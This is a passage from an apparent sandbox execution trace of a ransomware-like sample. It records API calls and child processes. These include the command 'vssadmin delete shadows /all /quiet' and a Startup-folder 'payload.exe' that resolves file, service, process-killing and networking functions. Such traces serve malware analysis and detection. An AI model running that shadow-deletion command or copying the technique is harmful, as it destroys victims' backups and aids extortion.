RtlReAllocateHeap (Heap=0x2e0000, Flags=0x0, Ptr=0x2f9090, Size=0x6e) returned 0x2f9090 [0033.147] GetProcessHeap () returned 0x2e0000 [0033.147] RtlSizeHeap (HeapHandle=0x2e0000, Flags=0x0, MemoryPointer=0x2f9090) returned 0x6e [0033.148] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a89f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0033.148] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0033.148] GetProcessHeap () returned 0x2e0000 [0033.148] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x128) returned 0x2f5b70 [0033.148] GetProcessHeap () returned 0x2e0000 [0033.148] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x240) returned 0x2e1ab0 [0033.148] GetProcessHeap () returned 0x2e0000 [0033.148] RtlReAllocateHeap (Heap=0x2e0000, Flags=0x0, Ptr=0x2e1ab0, Size=0x12a) returned 0x2e1ab0 [0033.148] GetProcessHeap () returned 0x2e0000 [0033.148] RtlSizeHeap (HeapHandle=0x2e0000, Flags=0x0, MemoryPointer=0x2e1ab0) returned 0x12a [0033.148] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a89f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0033.148] GetProcessHeap () returned 0x2e0000 [0033.148] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0xe8) returned 0x2f9db0 [0033.148] GetProcessHeap () returned 0x2e0000 [0033.148] RtlReAllocateHeap (Heap=0x2e0000, Flags=0x0, Ptr=0x2f9db0, Size=0x7e) returned 0x2f9db0 [0033.148] GetProcessHeap () returned 0x2e0000 [0033.148] RtlSizeHeap (HeapHandle=0x2e0000, Flags=0x0, MemoryPointer=0x2f9db0) returned 0x7e [0033.148] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0033.148] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vssadmin.*", fInfoLevelId=0x1, lpFindFileData=0x28eb10, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28eb10) returned 0xffffffffffffffff [0033.148] GetLastError () returned 0x2 [0033.148] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vssadmin", fInfoLevelId=0x1, lpFindFileData=0x28eb10, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28eb10) returned 0xffffffffffffffff [0033.148] GetLastError () returned 0x2 [0033.148] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0033.148] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.*", fInfoLevelId=0x1, lpFindFileData=0x28eb10, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28eb10) returned 0x2f9ba0 [0033.148] FindClose (in: hFindFile=0x2f9ba0 | out: hFindFile=0x2f9ba0) returned 1 [0033.149] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.COM", fInfoLevelId=0x1, lpFindFileData=0x28eb10, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28eb10) returned 0xffffffffffffffff [0033.149] GetLastError () returned 0x2 [0033.149] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.EXE", fInfoLevelId=0x1, lpFindFileData=0x28eb10, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28eb10) returned 0x2f9ba0 [0033.149] FindClose (in: hFindFile=0x2f9ba0 | out: hFindFile=0x2f9ba0) returned 1 [0033.149] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0033.149] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0033.149] GetConsoleTitleW (in: lpConsoleTitle=0x28f060, nSize=0x104 | out: lpConsoleTitle="Administrator: C:\\Windows\\system32\\cmd.exe") returned 0x2a [0033.149] GetProcessHeap () returned 0x2e0000 [0033.149] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x21c) returned 0x2f9110 [0033.149] GetConsoleTitleW (in: lpConsoleTitle=0x2f9120, nSize=0x104 | out: lpConsoleTitle="Administrator: C:\\Windows\\system32\\cmd.exe") returned 0x2a [0033.149] GetProcessHeap () returned 0x2e0000 [0033.149] RtlReAllocateHeap (Heap=0x2e0000, Flags=0x0, Ptr=0x2f9110, Size=0xc0) returned 0x2f9110 [0033.150] GetProcessHeap () returned 0x2e0000 [0033.150] RtlSizeHeap (HeapHandle=0x2e0000, Flags=0x0, MemoryPointer=0x2f9110) returned 0xc0 [0033.150] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\system32\\cmd.exe - vssadmin delete shadows /all /quiet") returned 1 [0033.150] GetProcessHeap () returned 0x2e0000 [0033.150] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x2f9110 | out: hHeap=0x2e0000) returned 1 [0033.150] InitializeProcThreadAttributeList (in: lpAttributeList=0x28ee18, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x28edd8 | out: lpAttributeList=0x28ee18, lpSize=0x28edd8) returned 1 [0033.150] UpdateProcThreadAttribute (in: lpAttributeList=0x28ee18, dwFlags=0x0, Attribute=0x60001, lpValue=0x28edc8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x28ee18, lpPreviousValue=0x0) returned 1 [0033.150] GetStartupInfoW (in: lpStartupInfo=0x28ef30 | out: lpStartupInfo=0x28ef30*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x101, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xe8, hStdOutput=0xf4, hStdError=0xf4)) [0033.150] GetProcessHeap () returned 0x2e0000 [0033.150] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x20) returned 0x2f4640 [0033.150] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0033.150] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0033.150] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0033.150] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0033.150] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0033.151] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0033.151] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0033.151] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0033.151] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0033.151] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0033.151] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0033.151] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0033.151] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0033.151] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0033.151] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0033.151] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0033.151] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0033.151] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0033.151] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0033.151] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0033.151] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0033.151] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0033.151] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0033.151] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0033.151] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0033.151] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0033.151] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0033.151] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0033.151] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0033.151] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0033.151] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0033.151] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0033.151] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0033.151] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0033.151] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0033.151] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0033.151] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0033.151] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0033.151] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0033.151] GetProcessHeap () returned 0x2e0000 [0033.151] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x2f4640 | out: hHeap=0x2e0000) returned 1 [0033.151] GetProcessHeap () returned 0x2e0000 [0033.151] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x12) returned 0x2f8900 [0033.151] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\vssadmin.exe", lpCommandLine="vssadmin delete shadows /all /quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x28ee50*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="vssadmin delete shadows /all /quiet", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x28ee00 | out: lpCommandLine="vssadmin delete shadows /all /quiet", lpProcessInformation=0x28ee00*(hProcess=0x50, hThread=0x54, dwProcessId=0x9cc, dwThreadId=0x9d0)) returned 1 [0033.158] CloseHandle (hObject=0x54) returned 1 [0033.158] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0033.158] GetProcessHeap () returned 0x2e0000 [0033.158] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x2feb10 | out: hHeap=0x2e0000) returned 1 [0033.158] GetEnvironmentStringsW () returned 0x2feb10* [0033.158] GetProcessHeap () returned 0x2e0000 [0033.158] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0xb0e) returned 0x2ff630 [0033.158] FreeEnvironmentStringsW (penv=0x2feb10) returned 1 [0033.158] NtQueryInformationProcess (in: ProcessHandle=0x50, ProcessInformationClass=0x0, ProcessInformation=0x28e708, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x28e708, ReturnLength=0x0) returned 0x0 [0033.158] ReadProcessMemory (in: hProcess=0x50, lpBaseAddress=0x7fffffd8000, lpBuffer=0x28e740, nSize=0x380, lpNumberOfBytesRead=0x28e700 | out: lpBuffer=0x28e740*, lpNumberOfBytesRead=0x28e700*=0x380) returned 1 [0033.158] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) Process: id = "3" image_name = "mode.com" filename = "c:\\windows\\system32\\mode.com" page_root = "0x4cfee000" os_pid = "0x998" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x970" cmd_line = "mode con cp select=1251" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "64" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 8 os_tid = 0x99c Process: id = "4" image_name = "vssadmin.exe" filename = "c:\\windows\\system32\\vssadmin.exe" page_root = "0x4e316000" os_pid = "0x9cc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x970" cmd_line = "vssadmin delete shadows /all /quiet" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "64" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 20 os_tid = 0x9d0 Thread: id = 21 os_tid = 0x9d8 Thread: id = 22 os_tid = 0x9e0 Thread: id = 23 os_tid = 0x9e4 Thread: id = 24 os_tid = 0x9e8 Process: id = "5" image_name = "vssvc.exe" filename = "c:\\windows\\system32\\vssvc.exe" page_root = "0x4e47c000" os_pid = "0x9ec" os_integrity_level = "0x4000" os_privileges = "0xe60b7e890" monitor_reason = "rpc_server" parent_id = "4" os_parent_pid = "0x9cc" cmd_line = "C:\\Windows\\system32\\vssvc.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "64" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\VSS" [0xe], "NT AUTHORITY\\Logon Session 00000000:00077896" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 26 os_tid = 0xa0c Thread: id = 27 os_tid = 0xa08 Thread: id = 28 os_tid = 0xa00 Thread: id = 29 os_tid = 0x9fc [0039.487] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xedda10 | out: lpSystemTimeAsFileTime=0xedda10*(dwLowDateTime=0x1579d1d0, dwHighDateTime=0x1d53e5f)) [0039.487] GetCurrentProcessId () returned 0x9ec [0039.487] GetCurrentThreadId () returned 0x9fc [0039.487] GetTickCount () returned 0x19858 [0039.488] QueryPerformanceCounter (in: lpPerformanceCount=0xedda18 | out: lpPerformanceCount=0xedda18*=15977931440) returned 1 [0039.488] malloc (_Size=0x100) returned 0x148e80 Thread: id = 30 os_tid = 0x9f8 Thread: id = 31 os_tid = 0x9f4 Thread: id = 32 os_tid = 0x9f0 Thread: id = 33 os_tid = 0xa10 Thread: id = 35 os_tid = 0xaa8 Thread: id = 42 os_tid = 0xb5c Thread: id = 43 os_tid = 0x5a8 Process: id = "6" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x49081000" os_pid = "0xaa0" os_integrity_level = "0x4000" os_privileges = "0x60814080" monitor_reason = "rpc_server" parent_id = "5" os_parent_pid = "0x9ec" cmd_line = "C:\\Windows\\System32\\svchost.exe -k swprv" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "64" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\swprv" [0xe], "NT AUTHORITY\\Logon Session 00000000:000786af" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 36 os_tid = 0xabc Thread: id = 37 os_tid = 0xab8 Thread: id = 38 os_tid = 0xab4 Thread: id = 39 os_tid = 0xab0 Thread: id = 40 os_tid = 0xaac Thread: id = 41 os_tid = 0xaa4 Thread: id = 44 os_tid = 0x828 Process: id = "7" image_name = "payload.exe" filename = "c:\\programdata\\microsoft\\windows\\start menu\\programs\\startup\\payload.exe" page_root = "0xcccd000" os_pid = "0x534" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "autostart" parent_id = "0" os_parent_pid = "0x0" cmd_line = "\"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\payload.exe\" " cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e656" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 45 os_tid = 0x538 [0257.370] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76890000 [0257.371] GetProcAddress (hModule=0x76890000, lpProcName="GetProcAddress") returned 0x768a1222 [0257.371] GetProcAddress (hModule=0x76890000, lpProcName="GetModuleHandleW") returned 0x768a34b0 [0257.371] GetProcAddress (hModule=0x76890000, lpProcName="FindNextFileW") returned 0x768a54ee [0257.371] GetProcAddress (hModule=0x76890000, lpProcName="FindClose") returned 0x768a4442 [0257.371] GetProcAddress (hModule=0x76890000, lpProcName="MoveFileW") returned 0x768b9af0 [0257.371] GetProcAddress (hModule=0x76890000, lpProcName="GetFileSizeEx") returned 0x768a59e2 [0257.371] GetProcAddress (hModule=0x76890000, lpProcName="GetModuleFileNameW") returned 0x768a4950 [0257.371] GetProcAddress (hModule=0x76890000, lpProcName="GetFileAttributesW") returned 0x768a1b18 [0257.371] GetProcAddress (hModule=0x76890000, lpProcName="ExitProcess") returned 0x768a7a10 [0257.371] GetProcAddress (hModule=0x76890000, lpProcName="GetCommandLineW") returned 0x768a5223 [0257.371] GetProcAddress (hModule=0x76890000, lpProcName="GetComputerNameW") returned 0x768add0e [0257.371] GetProcAddress (hModule=0x76890000, lpProcName="GetComputerNameA") returned 0x768bb6e0 [0257.371] GetProcAddress (hModule=0x76890000, lpProcName="CreateMutexW") returned 0x768a424c [0257.371] GetProcAddress (hModule=0x76890000, lpProcName="lstrlenW") returned 0x768a1700 [0257.371] GetProcAddress (hModule=0x76890000, lpProcName="lstrlenA") returned 0x768a5a4b [0257.371] GetProcAddress (hModule=0x76890000, lpProcName="GetCurrentProcess") returned 0x768a1809 [0257.371] GetProcAddress (hModule=0x76890000, lpProcName="WaitForSingleObject") returned 0x768a1136 [0257.372] GetProcAddress (hModule=0x76890000, lpProcName="GetLogicalDrives") returned 0x768a5371 [0257.372] GetProcAddress (hModule=0x76890000, lpProcName="GetTickCount") returned 0x768a110c [0257.372] GetProcAddress (hModule=0x76890000, lpProcName="DeleteFileW") returned 0x768a89b3 [0257.372] GetProcAddress (hModule=0x76890000, lpProcName="WideCharToMultiByte") returned 0x768a170d [0257.372] GetProcAddress (hModule=0x76890000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x768a1916 [0257.372] GetProcAddress (hModule=0x76890000, lpProcName="Sleep") returned 0x768a10ff [0257.372] GetProcAddress (hModule=0x76890000, lpProcName="LeaveCriticalSection") returned 0x779c2270 [0257.372] GetProcAddress (hModule=0x76890000, lpProcName="ReadFile") returned 0x768a3ed3 [0257.372] GetProcAddress (hModule=0x76890000, lpProcName="CreateFileW") returned 0x768a3f5c [0257.372] GetProcAddress (hModule=0x76890000, lpProcName="OpenMutexW") returned 0x768a5151 [0257.372] GetProcAddress (hModule=0x76890000, lpProcName="EnterCriticalSection") returned 0x779c22b0 [0257.372] GetProcAddress (hModule=0x76890000, lpProcName="WaitForMultipleObjects") returned 0x768a4220 [0257.372] GetProcAddress (hModule=0x76890000, lpProcName="lstrcmpiW") returned 0x768bd5cd [0257.372] GetProcAddress (hModule=0x76890000, lpProcName="lstrcmpiA") returned 0x768a3e8e [0257.372] GetProcAddress (hModule=0x76890000, lpProcName="DeleteCriticalSection") returned 0x779d45f5 [0257.372] GetProcAddress (hModule=0x76890000, lpProcName="ReleaseMutex") returned 0x768a111e [0257.372] GetProcAddress (hModule=0x76890000, lpProcName="CloseHandle") returned 0x768a1410 [0257.372] GetProcAddress (hModule=0x76890000, lpProcName="GetVersion") returned 0x768a4467 [0257.372] GetProcAddress (hModule=0x76890000, lpProcName="CreateThread") returned 0x768a34d5 [0257.372] GetProcAddress (hModule=0x76890000, lpProcName="ExpandEnvironmentStringsW") returned 0x768a4173 [0257.372] GetProcAddress (hModule=0x76890000, lpProcName="QueryPerformanceCounter") returned 0x768a1725 [0257.373] GetProcAddress (hModule=0x76890000, lpProcName="QueryPerformanceFrequency") returned 0x768a41f0 [0257.373] GetProcAddress (hModule=0x76890000, lpProcName="GetCurrentProcessId") returned 0x768a11f8 [0257.373] GetProcAddress (hModule=0x76890000, lpProcName="SetFileAttributesW") returned 0x768bd4f7 [0257.373] GetProcAddress (hModule=0x76890000, lpProcName="GetVolumeInformationW") returned 0x768bc860 [0257.373] GetProcAddress (hModule=0x76890000, lpProcName="WriteFile") returned 0x768a1282 [0257.373] GetProcAddress (hModule=0x76890000, lpProcName="SetFilePointerEx") returned 0x768bc807 [0257.373] GetProcAddress (hModule=0x76890000, lpProcName="SetEndOfFile") returned 0x768bce2e [0257.373] GetProcAddress (hModule=0x76890000, lpProcName="FindFirstFileW") returned 0x768a4435 [0257.373] GetProcAddress (hModule=0x76890000, lpProcName="GetProcessHeap") returned 0x768a14e9 [0257.373] GetProcAddress (hModule=0x76890000, lpProcName="HeapReAlloc") returned 0x779e1f6e [0257.373] GetProcAddress (hModule=0x76890000, lpProcName="HeapAlloc") returned 0x779ce026 [0257.373] GetProcAddress (hModule=0x76890000, lpProcName="HeapFree") returned 0x768a14c9 [0257.373] GetProcAddress (hModule=0x76890000, lpProcName="CreatePipe") returned 0x7692415b [0257.373] GetProcAddress (hModule=0x76890000, lpProcName="SetHandleInformation") returned 0x768b195c [0257.373] GetProcAddress (hModule=0x76890000, lpProcName="CreateProcessW") returned 0x768a103d [0257.373] GetProcAddress (hModule=0x76890000, lpProcName="CompareStringW") returned 0x768a3bca [0257.373] GetProcAddress (hModule=0x76890000, lpProcName="CompareStringA") returned 0x768a3c5a [0257.373] GetProcAddress (hModule=0x76890000, lpProcName="OpenProcess") returned 0x768a1986 [0257.373] GetProcAddress (hModule=0x76890000, lpProcName="TerminateProcess") returned 0x768bd802 [0257.373] GetProcAddress (hModule=0x76890000, lpProcName="GetSystemTime") returned 0x768a5a96 [0257.374] GetProcAddress (hModule=0x76890000, lpProcName="SystemTimeToFileTime") returned 0x768a5a7e [0257.374] GetProcAddress (hModule=0x76890000, lpProcName="GetLastError") returned 0x768a11c0 [0257.374] GetProcAddress (hModule=0x76890000, lpProcName="CreateToolhelp32Snapshot") returned 0x768c735f [0257.374] GetProcAddress (hModule=0x76890000, lpProcName="Process32NextW") returned 0x768c896c [0257.374] GetProcAddress (hModule=0x76890000, lpProcName="Process32FirstW") returned 0x768c8baf [0257.374] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76ee0000 [0257.382] GetProcAddress (hModule=0x76ee0000, lpProcName="RegOpenKeyExW") returned 0x76ef468d [0257.384] GetProcAddress (hModule=0x76ee0000, lpProcName="RegQueryValueExW") returned 0x76ef46ad [0257.384] GetProcAddress (hModule=0x76ee0000, lpProcName="RegSetValueExW") returned 0x76ef14d6 [0257.384] GetProcAddress (hModule=0x76ee0000, lpProcName="RegCloseKey") returned 0x76ef469d [0257.384] GetProcAddress (hModule=0x76ee0000, lpProcName="OpenProcessToken") returned 0x76ef4304 [0257.384] GetProcAddress (hModule=0x76ee0000, lpProcName="GetTokenInformation") returned 0x76ef431c [0257.384] GetProcAddress (hModule=0x76ee0000, lpProcName="OpenSCManagerW") returned 0x76eeca64 [0257.384] GetProcAddress (hModule=0x76ee0000, lpProcName="OpenServiceW") returned 0x76eeca4c [0257.384] GetProcAddress (hModule=0x76ee0000, lpProcName="CloseServiceHandle") returned 0x76ef369c [0257.384] GetProcAddress (hModule=0x76ee0000, lpProcName="ControlService") returned 0x76f07144 [0257.384] GetProcAddress (hModule=0x76ee0000, lpProcName="QueryServiceStatus") returned 0x76ef2a86 [0257.384] GetProcAddress (hModule=0x76ee0000, lpProcName="EnumDependentServicesW") returned 0x76ee1e3a [0257.384] GetProcAddress (hModule=0x76ee0000, lpProcName="EnumServicesStatusExW") returned 0x76eeb466 [0257.384] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76640000 [0257.425] GetProcAddress (hModule=0x76640000, lpProcName="SystemParametersInfoW") returned 0x766590d3 [0257.425] LoadLibraryA (lpLibFileName="Shell32.dll") returned 0x75690000 [0257.427] GetProcAddress (hModule=0x75690000, lpProcName="ShellExecuteExW") returned 0x756b1e46 [0257.433] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x779a0000 [0257.433] GetProcAddress (hModule=0x779a0000, lpProcName="NtQuerySystemInformation") returned 0x779bfda0 [0257.433] LoadLibraryA (lpLibFileName="mpr.dll") returned 0x73cd0000 [0258.357] GetProcAddress (hModule=0x73cd0000, lpProcName="WNetCloseEnum") returned 0x73cd2dd6 [0258.357] GetProcAddress (hModule=0x73cd0000, lpProcName="WNetOpenEnumW") returned 0x73cd2f06 [0258.357] GetProcAddress (hModule=0x73cd0000, lpProcName="WNetEnumResourceW") returned 0x73cd3058 [0258.358] LoadLibraryA (lpLibFileName="ws2_32.dll") returned 0x76f80000 [0258.359] GetProcAddress (hModule=0x76f80000, lpProcName="WSAStartup") returned 0x76f83ab2 [0258.359] GetProcAddress (hModule=0x76f80000, lpProcName="socket") returned 0x76f83eb8 [0258.359] GetProcAddress (hModule=0x76f80000, lpProcName="send") returned 0x76f86f01 [0258.359] GetProcAddress (hModule=0x76f80000, lpProcName="recv") returned 0x76f86b0e [0258.359] GetProcAddress (hModule=0x76f80000, lpProcName="connect") returned 0x76f86bdd [0258.359] GetProcAddress (hModule=0x76f80000, lpProcName="closesocket") returned 0x76f83918 [0258.359] GetProcAddress (hModule=0x76f80000, lpProcName="gethostbyname") returned 0x76f97673 [0258.359] GetProcAddress (hModule=0x76f80000, lpProcName="inet_addr") returned 0x76f8311b [0258.359] GetProcAddress (hModule=0x76f80000, lpProcName="ntohl") returned 0x76f82d57 [0258.359] GetProcAddress (hModule=0x76f80000, lpProcName="htonl") returned 0x76f82d57 [0258.359] GetProcAddress (hModule=0x76f80000, lpProcName="htons") returned 0x76f82d8b [0258.360] GetProcessHeap () returned 0x280000 [0258.360] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x20) returned 0x294218 [0258.360] QueryPerformanceCounter (in: lpPerformanceCount=0x18fdb8 | out: lpPerformanceCount=0x18fdb8*=6764690043) returned 1 [0258.360] GetTickCount () returned 0x5f1f [0258.360] GetCurrentProcessId () returned 0x534 [0258.360] GetTickCount () returned 0x5f1f [0258.360] GetTickCount () returned 0x5f1f [0258.360] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x20) returned 0x294240 [0258.360] GetVersion () returned 0x1db10106 [0258.360] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x7) returned 0x283828 [0258.360] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x10) returned 0x290d48 [0258.360] RtlReAllocateHeap 